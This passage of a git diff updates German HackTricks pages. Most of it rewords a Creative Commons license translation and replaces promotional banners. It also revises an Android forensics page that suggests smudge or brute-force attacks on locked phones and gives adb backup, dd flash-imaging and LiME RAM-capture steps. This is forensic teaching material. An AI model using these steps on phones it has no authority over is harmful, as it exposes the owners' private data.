festgelegt. -4. __Medien und Formate; technische Änderungen erlaubt.__ Der Lizenzgeber ermächtigt Sie, die lizenzierten Rechte in allen Medien und Formaten, die jetzt bekannt sind oder in Zukunft erstellt werden, auszuüben und technische Änderungen vorzunehmen, die dafür erforderlich sind. Der Lizenzgeber verzichtet darauf und/oder erklärt sich damit einverstanden, Ihnen das Recht oder die Befugnis zu untersagen, technische Änderungen vorzunehmen, die zur Ausübung der lizenzierten Rechte erforderlich sind, einschließlich technischer Änderungen, die erforderlich sind, um wirksame technische Maßnahmen zu umgehen. Im Sinne dieser Public License führen alleinige Änderungen, die gemäß diesem Abschnitt 2(a)(4) autorisiert sind, niemals zu angepasstem Material. +4. __Medien und Formate; technische Modifikationen erlaubt.__ Der Lizenzgeber autorisiert Sie, die Lizenzrechte in allen Medien und Formaten auszuüben, die jetzt bekannt sind oder in Zukunft erstellt werden, und technische Modifikationen vorzunehmen, die dazu erforderlich sind. Der Lizenzgeber verzichtet und/oder stimmt zu, kein Recht oder keine Autorität geltend zu machen, um Sie daran zu hindern, technische Modifikationen vorzunehmen, die erforderlich sind, um die Lizenzrechte auszuüben, einschließlich technischer Modifikationen, die erforderlich sind, um wirksame technologische Maßnahmen zu umgehen. Im Sinne dieser Öffentlichen Lizenz führt allein die Durchführung von Modifikationen, die durch diesen Abschnitt 2(a)(4) autorisiert sind, niemals zu angepasstem Material. -5. __Empfänger nachgelagerter Stufen.__ +5. __Empfänger nachgelagerter Rechte.__ -A. __Angebot des Lizenzgebers - Lizenziertes Material.__ Jeder Empfänger des lizenzierten Materials erhält automatisch ein Angebot des Lizenzgebers, die lizenzierten Rechte gemäß den Bedingungen dieser Public License auszuüben. +A. __Angebot des Lizenzgebers – Lizenziertes Material.__ Jeder Empfänger des lizenzierten Materials erhält automatisch ein Angebot des Lizenzgebers, die Lizenzrechte unter den Bedingungen dieser Öffentlichen Lizenz auszuüben. -B. __Keine nachgelagerten Einschränkungen.__ Sie dürfen keine zusätzlichen oder abweichenden Bedingungen oder Einschränkungen für das lizenzierte Material anbieten oder auferlegen, wenn dadurch die Ausübung der lizenzierten Rechte durch jeden Empfänger des lizenzierten Materials eingeschränkt wird. +B. __Keine nachgelagerten Beschränkungen.__ Sie dürfen keine zusätzlichen oder abweichenden Bedingungen oder Bedingungen anwenden oder wirksame technologische Maßnahmen auf das lizenzierte Material anwenden, wenn dadurch die Ausübung der Lizenzrechte durch jeden Empfänger des lizenzierten Materials eingeschränkt wird. -6. __Keine Unterstützung.__ Nichts in dieser Public License stellt eine Genehmigung oder einen Hinweis darauf dar oder darf so ausgelegt werden, dass Sie oder Ihre Nutzung des lizenzierten Materials mit dem Lizenzgeber oder anderen Personen verbunden ist, gesponsert, unterstützt oder offiziellen Status gewährt wird, wie in Abschnitt 3(a)(1)(A)(i) vorgesehen. +6. __Keine Unterstützung.__ Nichts in dieser Öffentlichen Lizenz stellt eine Erlaubnis dar oder kann so ausgelegt werden, dass Sie oder dass Ihre Nutzung des lizenzierten Materials mit dem Lizenzgeber oder anderen, die berechtigt sind, eine Zuschreibung gemäß Abschnitt 3(a)(1)(A)(i) zu erhalten, verbunden ist oder gesponsert, befürwortet oder offiziellen Status erhalten hat. b. ___Andere Rechte.___ -1. Moralische Rechte, wie das Recht auf Unversehrtheit, sind durch diese Public License nicht lizenziert, ebenso wenig wie Veröffentlichungs-, Datenschutz- und/oder andere ähnliche Persönlichkeitsrechte. Soweit möglich, verzichtet der Lizenzgeber darauf und/oder erklärt sich damit einverstanden, solche Rechte, die ihm gehören, in dem Umfang einzuschränken, der erforderlich ist, um Ihnen die Ausübung der lizenzierten Rechte zu ermöglichen, jedoch nicht darüber hinaus. +1. Moralrechte, wie das Recht auf Integrität, sind nicht durch diese Öffentliche Lizenz lizenziert, ebenso wenig wie Persönlichkeitsrechte, Publicity- und/oder ähnliche Persönlichkeitsrechte; jedoch verzichtet der Lizenzgeber und/oder stimmt zu, keine solchen Rechte, die vom Lizenzgeber gehalten werden, in dem begrenzten Umfang geltend zu machen, der erforderlich ist, um Ihnen die Ausübung der Lizenzrechte zu ermöglichen, jedoch nicht darüber hinaus. -2. Patent- und Markenrechte sind durch diese Public License nicht lizenziert. +2. Patent- und Markenrechte sind nicht durch diese Öffentliche Lizenz lizenziert. -3. Soweit möglich, verzichtet der Lizenzgeber auf das Recht, von Ihnen Lizenzgebühren für die Ausübung der lizenzierten Rechte zu erheben, sei es direkt oder über eine Verwertungsgesellschaft im Rahmen eines freiwilligen oder verzichtbaren gesetzlichen oder obligatorischen Lizenzierungssystems. In allen anderen Fällen behält sich der Lizenzgeber ausdrücklich das Recht vor, solche Lizenzgebühren zu erheben, auch wenn das lizenzierte Material nicht für nicht kommerzielle Zwecke verwendet wird. +3. Soweit möglich, verzichtet der Lizenzgeber auf das Recht, von Ihnen Lizenzgebühren für die Ausübung der Lizenzrechte zu erheben, sei es direkt oder über eine Verwertungsgesellschaft im Rahmen eines freiwilligen oder verzichtbaren gesetzlichen oder obligatorischen Lizenzierungssystems. In allen anderen Fällen behält sich der Lizenzgeber ausdrücklich das Recht vor, solche Lizenzgebühren zu erheben, auch wenn das lizenzierte Material nicht für nicht kommerzielle Zwecke verwendet wird. -## Abschnitt 3 - Lizenzbedingungen. +## Abschnitt 3 – Lizenzbedingungen. -Die Ausübung der lizenzierten Rechte unterliegt ausdrücklich den folgenden Bedingungen. +Die Ausübung der Lizenzrechte unterliegt ausdrücklich den folgenden Bedingungen. a. ___Zuschreibung.___ -1. Wenn Sie das lizenzierte Material (einschließlich in geänderter Form) teilen, müssen Sie: +1. Wenn Sie das lizenzierte Material teilen (auch in modifizierter Form), müssen Sie: A. Folgendes beibehalten, wenn es vom Lizenzgeber mit dem lizenzierten Material bereitgestellt wird: -i. Identifizierung der Urheber des lizenzierten Materials und aller anderen Personen, die berechtigt sind, eine Zuschreibung zu erhalten, auf jede zumutbare Weise, die vom Lizenzgeber angefordert wird (einschließlich unter einem Pseudonym, wenn dies vorgesehen ist); +i. Identifizierung der Urheber des lizenzierten Materials und anderer, die berechtigt sind, eine Zuschreibung zu erhalten, in jeder zumutbaren Weise, die vom Lizenzgeber angefordert wird (auch unter Pseudonym, wenn festgelegt); ii. einen Urheberrechtsvermerk; -iii. einen Hinweis auf diese Public License; +iii. einen Hinweis, der auf diese Öffentliche Lizenz verweist; -iv. einen Hinweis auf den Haftungsausschluss; +iv. einen Hinweis, der auf den Haftungsausschluss hinweist; -v. eine URI oder einen Hyperlink zum lizenzierten Material, soweit dies zumutbar möglich ist; +v. eine URI oder Hyperlink zum lizenzierten Material, soweit dies vernünftigerweise möglich ist; -B. angeben, ob Sie das lizenzierte Material geändert haben, und einen Hinweis auf frühere Änderungen beibehalten; und +B. angeben, ob Sie das lizenzierte Material modifiziert haben, und eine Angabe zu früheren Modifikationen beibehalten; und -C. angeben, dass das lizenzierte Material unter dieser Public License lizenziert ist, und den Text dieser Public License oder die URI oder den Hyperlink zu dieser Public License einschließen. +C. angeben, dass das lizenzierte Material unter dieser Öffentlichen Lizenz lizenziert ist, und den Text dieser Öffentlichen Lizenz oder die URI oder den Hyperlink zu dieser Öffentlichen Lizenz einschließen. -2. Sie können die Bedingungen in Abschnitt 3(a)(1) auf jede zumutbare Weise erfüllen, die auf dem Medium, den Mitteln und dem Kontext basiert, in dem Sie das lizenzierte Material teilen. Es kann beispielsweise angemessen sein, die Bedingungen zu erfüllen, indem Sie eine URI oder einen Hyperlink zu einer Ressource bereitstellen, die die erforderlichen Informationen enthält. +2. Sie können die Bedingungen in Abschnitt 3(a)(1) in jeder zumutbaren Weise basierend auf dem Medium, den Mitteln und dem Kontext, in dem Sie das lizenzierte Material teilen, erfüllen. Es kann beispielsweise vernünftig sein, die Bedingungen zu erfüllen, indem Sie eine URI oder einen Hyperlink zu einer Ressource bereitstellen, die die erforderlichen Informationen enthält. -3. Wenn der Lizenzgeber dies verlangt, müssen Sie alle Informationen gemäß Abschnitt 3(a)(1)(A) entfernen, soweit dies zumutbar möglich ist. +3. Wenn vom Lizenzgeber angefordert, müssen Sie alle Informationen entfernen, die gemäß Abschnitt 3(a)(1)(A) erforderlich sind, soweit dies vernünftigerweise möglich ist. -4. Wenn Sie angepasstes Material teilen, das Sie erstellt haben, darf die Lizenz des Anpassers Empfängern des angepassten Materials nicht die Einhaltung dieser Public License verhindern. +4. Wenn Sie angepasstes Material teilen, das Sie erstellt haben, darf die Lizenz des Adapters, die Sie anwenden, Empfänger des angepassten Materials nicht daran hindern, diese Öffentliche Lizenz einzuhalten. -## Abschnitt 4 - Sui Generis Datenbankrechte. +## Abschnitt 4 – Sui Generis Datenbankrechte. -Wenn die lizenzierten Rechte Sui Generis Datenbankrechte umfassen, die sich auf Ihre Nutzung des lizenzierten Materials beziehen: +Wenn die Lizenzrechte Sui Generis Datenbankrechte umfassen, die sich auf Ihre Nutzung des lizenzierten Materials beziehen: -a. Um Missverständnisse zu vermeiden, gewährt Ihnen Abschnitt 2(a)(1) das Recht, den gesamten Inhalt der Datenbank oder einen wesentlichen Teil davon für nicht kommerzielle Zwecke zu extrahieren, wiederzuverwenden, zu vervielfältigen und zu teilen; +a. Zur Vermeidung von Zweifeln gewährt Ihnen Abschnitt 2(a)(1) das Recht, alle oder einen wesentlichen Teil des Inhalts der Datenbank nur für nicht kommerzielle Zwecke zu extrahieren, wiederzuverwenden, zu vervielfältigen und zu teilen; -b. Wenn Sie den gesamten Inhalt der Datenbank oder einen wesentlichen Teil davon in einer Datenbank verwenden, für die Sie Sui Generis Datenbankrechte haben, dann ist die Datenbank, für die Sie Sui Generis Datenbankrechte haben (aber nicht deren einzelne Inhalte), angepasstes Material; und +b. Wenn Sie den gesamten oder einen wesentlichen Teil des Datenbankinhalts in einer Datenbank einschließen, für die Sie Sui Generis Datenbankrechte haben, dann ist die Datenbank, für die Sie Sui Generis Datenbankrechte haben (aber nicht ihre einzelnen Inhalte), angepasstes Material; und -c. Sie müssen die Bedingungen in Abschnitt 3(a) einhalten, wenn Sie den gesamten Inhalt der Datenbank oder einen wesentlichen Teil davon teilen. +c. Sie müssen die Bedingungen in Abschnitt 3(a) einhalten, wenn Sie den gesamten oder einen wesentlichen Teil des Datenbankinhalts teilen. -Um Missverständnisse zu vermeiden, ergänzt dieser Abschnitt 4 die Verpflichtungen gemäß dieser Public License und ersetzt sie nicht, wenn die lizenzierten Rechte andere Urheberrechte und ähnliche Rechte umfassen. +Zur Vermeidung von Zweifeln ergänzt dieser Abschnitt 4 und ersetzt nicht Ihre Verpflichtungen unter dieser Öffentlichen Lizenz, wenn die Lizenzrechte auch andere Urheberrechte und ähnliche Rechte umfassen. -## Abschnitt 5 - Haftungsausschluss und Haftungsbeschränkung. +## Abschnitt 5 – Haftungsausschluss und Haftungsbeschränkung. -a. __Sofern der Lizenzgeber nicht ausdrücklich etwas anderes übernimmt, bietet der Lizenzgeber das lizenzierte Material nach Möglichkeit "wie es ist" und "wie verfügbar" an und gibt keine Zusicherungen oder Gewährleistungen jeglicher Art in Bezug auf das lizenzierte Material ab, ob ausdrücklich, stillschweigend, gesetzlich oder anderweitig. Dies umfasst unter anderem keine Gewährleistungen hinsichtlich des Titels, der Verkehrsfähigkeit, der Eignung für einen bestimmten Zweck, der Nichtverletzung von Rechten, dem Vorhandensein oder Nichtvorhandensein von versteckten oder anderen Mängeln, der Genauigkeit oder des Vorhandenseins oder Nichtvorhandenseins von Fehlern, ob bekannt oder entdeckbar. Soweit der vollständige oder teilweise Haftungsausschluss von Gewährleistungen nicht zulässig ist, gilt dieser Haftungsausschluss möglicherweise nicht für Sie.__ +a. __Sofern nicht gesondert vom Lizenzgeber übernommen, bietet der Lizenzgeber das lizenzierte Material nach Möglichkeit so wie es ist und wie verfügbar an und gibt keine Zusicherungen oder Gewährleistungen jeglicher Art bezüglich des lizenzierten Materials ab, sei es ausdrücklich, implizit, gesetzlich oder anderweitig. Dies umfasst unter anderem, ohne Einschränkung, Gewährleistungen hinsichtlich des Titels, der Marktgängigkeit, der Eignung für einen bestimmten Zweck, der Nichtverletzung, des Vorhandenseins oder Nichtvorhandenseins von versteckten oder anderen Mängeln, der Genauigkeit oder des Vorhandenseins oder Nichtvorhandenseins von Fehlern, ob bekannt oder entdeckbar. Wenn Haftungsausschlüsse in vollem Umfang oder teilweise nicht zulässig sind, ist dieser Haftungsausschluss möglicherweise nicht auf Sie anwendbar.__ -b. __Soweit gesetzlich zulässig, haftet der Lizenzgeber Ihnen gegenüber aufgrund einer Rechtsgrundlage (einschließlich, aber nicht beschränkt auf Fahrlässigkeit) oder anderweitig nicht für direkte, besondere, indirekte, zufällige, Folge-, Straf-, exemplarische oder andere Verluste, Kosten, Ausgaben oder Schäden, die sich aus dieser Public License oder der Nutzung des lizenzierten Materials ergeben, selbst wenn der Lizenzgeber auf die Möglichkeit solcher Verluste, Kosten, Ausgaben oder Schäden hingewiesen wurde. Soweit eine Haftungsbeschränkung ganz oder teilweise nicht zulässig ist, gilt diese Beschränkung möglicherweise nicht für Sie.__ +b. __Soweit gesetzlich zulässig, haftet der Lizenzgeber Ihnen auf keiner Rechtsgrundlage (einschließlich, aber nicht beschränkt auf Fahrlässigkeit) oder anderweitig für direkte, besondere, indirekte, zufällige, Folge-, Straf- oder sonstige Verluste, Kosten, Ausgaben oder Schäden, die sich aus dieser Öffentlichen Lizenz oder der Nutzung des lizenzierten Materials ergeben, selbst wenn der Lizenzgeber auf die Möglichkeit solcher Verluste, Kosten, Ausgaben oder Schäden hingewiesen wurde. Wenn eine Haftungsbeschränkung in vollem Umfang oder teilweise nicht zulässig ist, ist diese Beschränkung möglicherweise nicht auf Sie anwendbar.__ -c. Der oben genannte Haftungsausschluss und die Haftungsbeschränkung sind so auszulegen, dass sie, soweit möglich, einer absoluten Haftungsfreistellung und dem Verzicht auf jegliche Haftung am nächsten kommen -## Abschnitt 7 - Weitere Bedingungen. +c. Der oben bereitgestellte Haftungsausschluss und die Haftungsbeschränkung sind so auszulegen, dass sie, soweit möglich, einer absoluten Haftungsfreistellung und dem Verzicht auf alle Haftungen am nächsten kommen. -a. Der Lizenzgeber ist nicht an zusätzliche oder abweichende Bedingungen gebunden, die von Ihnen mitgeteilt werden, es sei denn, dies wurde ausdrücklich vereinbart. +## Abschnitt 6 – Laufzeit und Beendigung. -b. Alle Vereinbarungen, Verständigungen oder Abmachungen bezüglich des lizenzierten Materials, die hier nicht angegeben sind, sind von den Bedingungen dieser öffentlichen Lizenz getrennt und unabhängig. +a. Diese Öffentliche Lizenz gilt für die Laufzeit der hier lizenzierten Urheberrechte und ähnlichen Rechte. Wenn Sie jedoch gegen diese Öffentliche Lizenz verstoßen, erlöschen Ihre Rechte unter dieser Öffentlichen Lizenz automatisch. -## Abschnitt 8 - Auslegung. +b. Wenn Ihr Recht zur Nutzung des lizenzierten Materials gemäß Abschnitt 6(a) erloschen ist, wird es wiederhergestellt: -a. Zur Vermeidung von Zweifeln reduziert, begrenzt, beschränkt oder legt diese öffentliche Lizenz keine Bedingungen für die Nutzung des lizenzierten Materials fest, die ohne Genehmigung gemäß dieser öffentlichen Lizenz rechtmäßig vorgenommen werden könnten. +1. automatisch ab dem Datum, an dem der Verstoß behoben ist, vorausgesetzt, er wird innerhalb von 30 Tagen nach Ihrer Entdeckung des Verstoßes behoben; oder -b. Soweit möglich wird eine Bestimmung dieser öffentlichen Lizenz, die für nicht durchsetzbar erachtet wird, automatisch in dem erforderlichen Mindestmaß reformiert, um sie durchsetzbar zu machen. Kann die Bestimmung nicht reformiert werden, wird sie ohne Auswirkung auf die Durchsetzbarkeit der verbleibenden Bedingungen dieser öffentlichen Lizenz abgetrennt. +2. auf ausdrückliche Wiederherstellung durch den Lizenzgeber. -c. Keine Bestimmung dieser öffentlichen Lizenz wird aufgehoben und kein Verstoß wird geduldet, es sei denn, dies wurde ausdrücklich vom Lizenzgeber vereinbart. +Zur Vermeidung von Zweifeln beeinträchtigt dieser Abschnitt 6(b) nicht das Recht des Lizenzgebers, Maßnahmen gegen Ihre Verstöße gegen diese Öffentliche Lizenz zu ergreifen. -d. Nichts in dieser öffentlichen Lizenz stellt eine Beschränkung oder einen Verzicht auf etwaige Privilegien und Immunitäten dar, die für den Lizenzgeber oder Sie gelten, einschließlich der rechtlichen Verfahren jeder Gerichtsbarkeit oder Behörde. +c. Zur Vermeidung von Zweifeln kann der Lizenzgeber das lizenzierte Material auch unter separaten Bedingungen anbieten oder die Verbreitung des lizenzierten Materials jederzeit einstellen; dies beendet jedoch nicht diese Öffentliche Lizenz. + +d. Abschnitte 1, 5, 6, 7 und 8 überdauern die Beendigung dieser Öffentlichen Lizenz. +## Abschnitt 7 – Weitere Bedingungen. + +a. Der Lizenzgeber ist nicht an zusätzliche oder abweichende Bedingungen gebunden, die von Ihnen mitgeteilt werden, es sei denn, es wurde ausdrücklich vereinbart. + +b. Alle Vereinbarungen, Verständnisse oder Abmachungen bezüglich des lizenzierten Materials, die hier nicht aufgeführt sind, sind von den Bedingungen dieser öffentlichen Lizenz getrennt und unabhängig. + +## Abschnitt 8 – Auslegung. + +a. Zur Vermeidung von Zweifeln reduziert, beschränkt, begrenzt oder legt diese öffentliche Lizenz nicht Bedingungen für die Nutzung des lizenzierten Materials fest, die rechtmäßig ohne Genehmigung gemäß dieser öffentlichen Lizenz vorgenommen werden könnten. + +b. Soweit möglich wird eine Bestimmung dieser öffentlichen Lizenz automatisch in dem minimal erforderlichen Umfang umgestaltet, um sie durchsetzbar zu machen, wenn sie als nicht durchsetzbar erachtet wird. Kann die Bestimmung nicht umgestaltet werden, wird sie von dieser öffentlichen Lizenz abgetrennt, ohne die Durchsetzbarkeit der verbleibenden Bedingungen zu beeinträchtigen. + +c. Keine Bestimmung dieser öffentlichen Lizenz wird aufgehoben und kein Verstoß wird geduldet, es sei denn, der Lizenzgeber hat ausdrücklich zugestimmt. + +d. Nichts in dieser öffentlichen Lizenz stellt eine Beschränkung oder einen Verzicht auf etwaige Privilegien und Immunitäten dar, die dem Lizenzgeber oder Ihnen zustehen, einschließlich der rechtlichen Verfahren jeder Gerichtsbarkeit oder Behörde. ``` Creative Commons is not a party to its public licenses. Notwithstanding, Creative Commons may elect to apply one of its public licenses to material it publishes and in those instances will be considered the “Licensor.” Except for the limited purpose of indicating that material is shared under a Creative Commons public license or as otherwise permitted by the Creative Commons policies published at [creativecommons.org/policies](http://creativecommons.org/policies), Creative Commons does not authorize the use of the trademark “Creative Commons” or any other trademark or logo of Creative Commons without its prior written consent including, without limitation, in connection with any unauthorized modifications to any of its public licenses or any other arrangements, understandings, or agreements concerning use of licensed material. For the avoidance of doubt, this paragraph does not form part of the public licenses. Creative Commons may be contacted at [creativecommons.org](http://creativecommons.org/). ``` +{% hint style="success" %} +Lernen Sie & üben Sie AWS-Hacking: [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen Sie & üben Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs zu den** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositories einreichen. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositories senden.
+{% endhint %} diff --git a/android-forensics.md b/android-forensics.md index 279cb15e0..d73e0ca67 100644 --- a/android-forensics.md +++ b/android-forensics.md @@ -1,51 +1,53 @@ # Android Forensik +{% hint style="success" %} +Lernen Sie AWS-Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Lernen Sie AWS-Hacking von Grund auf mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegramm-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositorys senden.
+{% endhint %} ## Gesperrtes Gerät -Um Daten von einem Android-Gerät extrahieren zu können, muss es entsperrt sein. Wenn es gesperrt ist, können Sie Folgendes tun: +Um mit der Extraktion von Daten von einem Android-Gerät zu beginnen, muss es entsperrt sein. Wenn es gesperrt ist, können Sie: -* Überprüfen Sie, ob das Gerät die USB-Debugging-Funktion aktiviert hat. -* Überprüfen Sie auf einen möglichen [Smudge-Angriff](https://www.usenix.org/legacy/event/woot10/tech/full\_papers/Aviv.pdf) +* Überprüfen, ob das Gerät die USB-Debugging aktiviert hat. +* Überprüfen Sie auf einen möglichen [Fingerabdruckangriff](https://www.usenix.org/legacy/event/woot10/tech/full\_papers/Aviv.pdf) * Versuchen Sie es mit [Brute-Force](https://www.cultofmac.com/316532/this-brute-force-device-can-crack-any-iphones-pin-code/) ## Datenbeschaffung -Erstellen Sie ein [Android-Backup mit adb](mobile-pentesting/android-app-pentesting/adb-commands.md#backup) und extrahieren Sie es mit dem [Android Backup Extractor](https://sourceforge.net/projects/adbextractor/): `java -jar abe.jar unpack file.backup file.tar` +Erstellen Sie ein [Android-Backup mit adb](mobile-pentesting/android-app-pentesting/adb-commands.md#backup) und extrahieren Sie es mit [Android Backup Extractor](https://sourceforge.net/projects/adbextractor/): `java -jar abe.jar unpack file.backup file.tar` -### Bei Root-Zugriff oder physischer Verbindung zur JTAG-Schnittstelle +### Bei Root-Zugriff oder physischer Verbindung zum JTAG-Interface * `cat /proc/partitions` (Suchen Sie den Pfad zum Flash-Speicher, normalerweise ist der erste Eintrag _mmcblk0_ und entspricht dem gesamten Flash-Speicher). * `df /data` (Ermitteln Sie die Blockgröße des Systems). -* dd if=/dev/block/mmcblk0 of=/sdcard/blk0.img bs=4096 (Führen Sie dies mit den Informationen zur Blockgröße aus, die Sie gesammelt haben). +* dd if=/dev/block/mmcblk0 of=/sdcard/blk0.img bs=4096 (Führen Sie es mit den Informationen aus der Blockgröße aus). ### Speicher -Verwenden Sie den Linux Memory Extractor (LiME), um Informationen zum RAM zu extrahieren. Es handelt sich um eine Kernel-Erweiterung, die über adb geladen werden sollte. +Verwenden Sie den Linux Memory Extractor (LiME), um die RAM-Informationen zu extrahieren. Es handelt sich um eine Kernelerweiterung, die über adb geladen werden sollte. + +{% hint style="success" %} +Lernen Sie AWS-Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-Lernen Sie AWS-Hacking von Grund auf mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegramm-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositorys senden.
+{% endhint %} diff --git a/backdoors/icmpsh.md b/backdoors/icmpsh.md index dcdeb52c6..b31485e12 100644 --- a/backdoors/icmpsh.md +++ b/backdoors/icmpsh.md @@ -1,23 +1,23 @@ +{% hint style="success" %} +Lernen Sie & üben Sie AWS-Hacking: [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen Sie & üben Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Lernen Sie AWS-Hacking von Grund auf mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositorys senden.
